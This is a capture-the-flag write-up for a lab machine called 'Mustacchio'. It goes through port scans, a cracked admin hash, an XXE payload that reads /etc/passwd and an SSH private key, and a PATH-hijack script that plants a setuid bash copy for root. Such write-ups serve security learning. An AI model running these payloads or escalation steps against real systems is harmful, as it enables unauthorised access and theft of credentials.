Skip to main content

Mustacchio

Enumeration
#

nmap -sVC 10.10.23.211        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-07 16:05 +0545
Nmap scan report for 10.10.23.211 (10.10.23.211)
Host is up (0.21s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
|   256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_  256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.74 seconds

rustscan -a 10.10.23.211        
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/k21/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.23.211:22
Open 10.10.23.211:80
Open 10.10.23.211:8765
[~] Starting Script(s)
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-07 16:09 +0545
Initiating Ping Scan at 16:09
Scanning 10.10.23.211 [4 ports]
Completed Ping Scan at 16:09, 3.04s elapsed (1 total hosts)
Nmap scan report for 10.10.23.211 [host down, received no-response]
Read data files from: /usr/share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)

Lets see in port 80.

Hmm lets do directory busting.

Lets enumerate all. And we can find this.

And we got something.

But we haven’t face any login pages. Hmmm. admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

There was something in port 8765. Lets see. And we got the login page.

Lets try to login. But we could not. Wait it might be hash.

Hmm so we got the password. bulldog19.

We logged in.

Exploit
#

Hmm so the page only have a comment doing feature. We might do XXS,XXE,SSRF or similar.

Lets try what we can do.

Lets first of all capture the request in burp.

And it is using xml to send data to server. We might exploit it.

Lets use xxe payloads to do so. And more interesting thing.

Hmm.

So we could do so.

Now we can make or get a simple xxe paylaod to read file cntent.

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&xxe;</com>
</comment>

So what is happening here,

  • first we are making DTD which will have the content of /etc/passwd.
  • After that we are declaring that in <com></com>.
  • So that xxe will contain the content of /etc/passwd.
  • We also have to do url encode.

And we are successful.

Now we know that message and users.

Foothold
#

Lets try to read a private key. And we can successfully read /home/barry/.ssh/id_rsa.

Lets try to do ssh. But first we have to crack the hash.

And it was very quick.

Lets do ssh as barry.

Privelege Escalation
#

Now lets enumerate further. Hmm interesting thing in joes home directory.

And doing strings revealed it is using a command tail to reaf /var/log/nginx/access.log.

Lets check that log file too. But we don’t have a permission.

What can we do? We can execute it and we can see but nothing there too.

Now the question is can we change the $PATH variable. Lets see. export PATH=/tmp:$PATH echo $PATH

And its possible. Now lets create our own tail command.

#!/bin/bash
cp /bin/bash /tmp/root && chmod 4777 /tmp/root
echo "Done."

Hmm and we will give a executable permission. Now if that binary tried to run tail command,our small script will run.

and we got it.

Done
#

And done.

Now we can put our ssh public key in /root/.ssh/authorized_keys and get stable root shell.

And lots of thing learned again. I hope you enjoyed doing this and learned new thing.

There are no articles to list here yet.